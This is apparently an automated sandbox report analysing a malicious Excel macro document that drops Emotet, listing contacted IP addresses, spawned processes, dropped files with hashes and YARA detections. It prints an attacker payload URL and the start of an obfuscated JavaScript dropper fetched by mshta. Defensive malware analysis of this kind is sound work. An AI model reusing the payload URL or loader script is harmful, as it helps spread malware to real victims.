                                            327979DIAMATRIXZAtrue
                                            173.212.193.249
                                            unknownGermany
                                            51167CONTABODEtrue
                                            45.176.232.124
                                            unknownColombia
                                            267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                            178.79.147.66
                                            unknownUnited Kingdom
                                            63949LINODE-APLinodeLLCUStrue
                                            212.237.5.209
                                            unknownItaly
                                            31034ARUBA-ASNITtrue
                                            162.243.175.63
                                            unknownUnited States
                                            14061DIGITALOCEAN-ASNUStrue
                                            176.104.106.96
                                            unknownSerbia
                                            198371NINETRStrue
                                            207.38.84.195
                                            unknownUnited States
                                            30083AS-30083-GO-DADDY-COM-LLCUStrue
                                            164.68.99.3
                                            unknownGermany
                                            51167CONTABODEtrue
                                            192.254.71.210
                                            unknownUnited States
                                            64235BIGBRAINUStrue
                                            212.237.56.116
                                            unknownItaly
                                            31034ARUBA-ASNITtrue
                                            104.168.155.129
                                            unknownUnited States
                                            54290HOSTWINDSUStrue
                                            45.142.114.231
                                            unknownGermany
                                            44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                            203.114.109.124
                                            unknownThailand
                                            131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                            209.59.138.75
                                            unknownUnited States
                                            32244LIQUIDWEBUStrue
                                            159.8.59.82
                                            unknownUnited States
                                            36351SOFTLAYERUStrue
                                            129.232.188.93
                                            unknownSouth Africa
                                            37153xneeloZAtrue
                                            91.240.118.172
                                            unknownunknown
                                            49453GLOBALLAYERNLtrue
                                            58.227.42.236
                                            unknownKorea Republic of
                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                            213.186.33.4
                                            weezual.frFrance
                                            16276OVHFRfalse
                                            158.69.222.101
                                            unknownCanada
                                            16276OVHFRtrue
                                            104.251.214.46
                                            unknownUnited States
                                            54540INCERO-HVVCUStrue
                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:562504
                                            Start date:28.01.2022
                                            Start time:23:02:54
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 27s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:opastonline.com.xls
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:16
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLS@18/13@5/48
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HDC Information:
                                            • Successful, ratio: 13.4% (good quality ratio 11.1%)
                                            • Quality average: 63.8%
                                            • Quality standard deviation: 34.2%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xls
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 92.123.101.210, 92.123.101.179, 92.123.101.170, 209.197.3.8
                                            • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                            • Execution Graph export aborted for target mshta.exe, PID 2204 because there are no executed function
                                            • Execution Graph export aborted for target powershell.exe, PID 2792 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: opastonline.com.xls
                                            TimeTypeDescription
                                            23:03:22API Interceptor61x Sleep call for process: mshta.exe modified
                                            23:03:23API Interceptor226x Sleep call for process: svchost.exe modified
                                            23:03:26API Interceptor443x Sleep call for process: powershell.exe modified
                                            23:03:43API Interceptor115x Sleep call for process: rundll32.exe modified
                                            No context
                                            No context
                                            No context
                                            No context
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):548864
                                            Entropy (8bit):6.980530647943679
                                            Encrypted:false
                                            SSDEEP:12288:B2AavzUBPSczbeeTLjv5yMwWd3DYr6i64/:OUBPSczbeeTnvtZDWA
                                            MD5:9AA05EC3F322A4F54E5E684EAAD88173
                                            SHA1:3CB05C3C4E013DD630197193544FBE71001FD381
                                            SHA-256:236703FCE8B84BABD918EC9BBA584F1948A11446BD427569AAB3F24CA8AF266D
                                            SHA-512:64DA0227FED760B5E6C717042A8248DAB85B08A87097B64E44769725751838F240B3AE3D84D496B6128F3446FFF302A420E94CC0B887F182B4EB808F74F9B369
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):61414
                                            Entropy (8bit):7.995245868798237
                                            Encrypted:true
                                            SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                            MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                            SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                            SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                            SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                            Malicious:false
                                            Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):328
                                            Entropy (8bit):3.100264519441001
                                            Encrypted:false
                                            SSDEEP:6:kKb7k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:H9kPlE99SNxAhUeYlUSA/t
                                            MD5:9CFF67FC66884D921EF01C6ADAECE9FA
                                            SHA1:F686D3B76BEBADFE629C3A6AB7F636D8BD3C45D8
                                            SHA-256:5C1940F12ABADC8DA11F95542D1687EC6CF77960D3D85A980BE2F9C073CC21A8
                                            SHA-512:0145E943C72E81CA77D331B1D77A1A059A5495D1F85171B1B161DD592F8DA81011ED5FC05822CF8AFFE04077A4A8A87CD9D39A691BBC98E42CA748172726EDB8
                                            Malicious:false
                                            Preview:p...... ........rQ./....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                            Process:C:\Windows\System32\mshta.exe
                                            File Type:data
                                            Category:downloaded
                                            Size (bytes):11076
                                            Entropy (8bit):6.175226521386573
                                            Encrypted:false
                                            SSDEEP:192:aYCuCkQ5yT/yBkFwvrJ8o2bwcwJckCK5N/JR0In++uYJv1FLnb69Ree/K+HNRd:aYCPkkyT/yy0qacnkCoqJU9pnW/Kgv
                                            MD5:E43FD46945688079796528C687495CC6
                                            SHA1:165FB805FF8F3470F416CBBF3D67EB1D09B5B9A2
                                            SHA-256:A71C840B44FDCDF0C4066304B4FDC54E7E57A7F9FBA4F83D3B02739825F9B93C
                                            SHA-512:F364A43E470442A596B137DC9C8AD3E0936D75C9C1BE29587492B5F5E7F941137D6AC96CBC12746C8139B314BBC8B8FF708F01EAB24423BC3EA484386CDDB639
                                            Malicious:false
                                            IE Cache URL:http://91.240.118.172/cc/vv/fe.html
                                            Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';i8Hwi4f5v6ham=new Array();p2N61T634cG0v=new Array();p2N61T634cG0v[0]='g%77%35n%53\172%32%76' ;i8Hwi4f5v6ham[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.v.\\.1.4.1.%.7.2.%.2.
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.1464700112623651
                                            Encrypted:false
                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):61414
                                            Entropy (8bit):7.995245868798237
                                            Encrypted:true
                                            SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                            MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                            SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                            SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                            SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                            Malicious:false
                                            Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):161595
                                            Entropy (8bit):6.302448239972517
                                            Encrypted:false
                                            SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                            MD5:D99661D0893A52A0700B8AE68457351A
                                            SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                            SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                            SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                            Malicious:false
                                            Preview:0..w6..*.H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):28672
                                            Entropy (8bit):3.4042783261155494
                                            Encrypted:false
                                            SSDEEP:768:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJS6ypP3:a8rk3hbdlylKsgqopeJBWhZFGkE+cL2D
                                            MD5:C96E48F1A43DB6DC70AA5605F71594CC
                                            SHA1:AC619CBB44E70D7874DE9D21B8A21531E16332DB
                                            SHA-256:99D8FE70EC2F87FA1FE76C69B6908B67A112F3ADFB091DADA1448D851327AA06
                                            SHA-512:5C5C6857397BD5870D9DF74A178718272051A31438421513695D3F8E369B5F16C354692013393E3E0E98D983BA759207524CAD2DB47FF57832E4B71CC632E758
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5823730838627643
                                            Encrypted:false
                                            SSDEEP:96:chQCcMqeqvsqvJCwovz8hQCcMqeqvsEHyqvJCworlzIuY7HcUVhhlUVJA2:cizovz8inHnorlzIeUVhAA2
                                            MD5:441EC579C1E997A854B1ADA4ED0217DC
                                            SHA1:D1303FFE6926F7A6695BD8051D5B34D1C547019C
                                            SHA-256:DBCE8A9BACA2003C7CEB1BB86BA93C174BC0B98AA1D72365F74647C5C85F7439
                                            SHA-512:63D21A798D0F5A1857F0A979D68A8C9A3DC1391391FDBC22B2854B50F85C729D943C6C3708D1D598D091D2E379689AA175594A2C16003C206D38031618E18E64
                                            Malicious:false
                                            Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5823730838627643
                                            Encrypted:false
                                            SSDEEP:96:chQCcMqeqvsqvJCwovz8hQCcMqeqvsEHyqvJCworlzIuY7HcUVhhlUVJA2:cizovz8inHnorlzIeUVhAA2
                                            MD5:441EC579C1E997A854B1ADA4ED0217DC
                                            SHA1:D1303FFE6926F7A6695BD8051D5B34D1C547019C
                                            SHA-256:DBCE8A9BACA2003C7CEB1BB86BA93C174BC0B98AA1D72365F74647C5C85F7439
                                            SHA-512:63D21A798D0F5A1857F0A979D68A8C9A3DC1391391FDBC22B2854B50F85C729D943C6C3708D1D598D091D2E379689AA175594A2C16003C206D38031618E18E64
                                            Malicious:false
                                            Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                            Category:dropped
                                            Size (bytes):92160
                                            Entropy (8bit):6.88344236407985
                                            Encrypted:false
                                            SSDEEP:1536:D8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhQ:Dgk3hbdlylKsgqopeJBWhZFGkE+cL2N8
                                            MD5:2AB9E9C775BADB4998A5132AFFFCAFCA
                                            SHA1:2F47DE4F18B9F3F6303542A55E472FDE40F57224
                                            SHA-256:85AB91DE171E86B582CCEE9D16262AB9EDCD8CA3C3759ED3F52918D1205DED70
                                            SHA-512:069F7DB9B271A5EE0A8425F62D12F764E3413FC80D801247F58A76E3CD1977B005CFABB817D51A66BC7A950151E785178E4110DE96162927B6480D5088EC34B5
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\opastonline.com.xls, Author: John Lambert @JohnLaTwC
                                            • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\opastonline.com.xls, Author: Joe Security
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...........
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):548864
                                            Entropy (8bit):6.980530647943679
                                            Encrypted:false
                                            SSDEEP:12288:B2AavzUBPSczbeeTLjv5yMwWd3DYr6i64/:OUBPSczbeeTnvtZDWA
                                            MD5:9AA05EC3F322A4F54E5E684EAAD88173
                                            SHA1:3CB05C3C4E013DD630197193544FBE71001FD381
                                            SHA-256:236703FCE8B84BABD918EC9BBA584F1948A11446BD427569AAB3F24CA8AF266D
                                            SHA-512:64DA0227FED760B5E6C717042A8248DAB85B08A87097B64E44769725751838F240B3AE3D84D496B6128F3446FFF302A420E94CC0B887F182B4EB808F74F9B369
                                            Malicious:false
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................
                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
                                            Entropy (8bit):6.869311509098816
                                            TrID:
                                            • Microsoft Excel sheet (30009/1) 78.94%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                            File name:opastonline.com.xls
                                            File size:92444
                                            MD5:e42ac962bed3fc210b24f8a87161e9b3
                                            SHA1:0c5bbeb25cd544993acefbc3041b23f99a56a7d5
                                            SHA256:601121c30531ce26c85a232f1e76df6a0eec591296ff711d45912db421d67a10
                                            SHA512:79df64f46f841c6c551d44908cc068c7a22f3ac6774366056d15d4fe923e4bdeac8bda470d64d47cc615405027a1bcc8812e3a3617c89f8f7525cd75c2778668
                                            SSDEEP:1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhQ:ugk3hbdlylKsgqopeJBWhZFGkE+cL2N8
                                            File Content Preview:........................>......................................................................................................................................................................................................................................
                                            Icon Hash:e4eea286a4b4bcb4
                                            Document Type:OLE
                                            Number of OLE Files:1
                                            Has Summary Info:True
                                            Application Name:Microsoft Excel
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:True
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True
                                            Code Page:1251
                                            Author:xXx
                                            Last Saved By:xXx
                                            Create Time:2022-01-27 23:12:32
                                            Last Saved Time:2022-01-28 17:08:40
                                            Creating Application:Microsoft Excel
                                            Security:0
                                            Document Code Page:1251
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:1048576
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.339840493791
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P r o t e c t . . . . . S h e e t 1 . . . . . L I N K O . . . . . . . . . . . . . . . . . W o r k s h e e t s .
                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b5 00 00 00
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.259989164271
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 0 . \\ . . . . @ . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
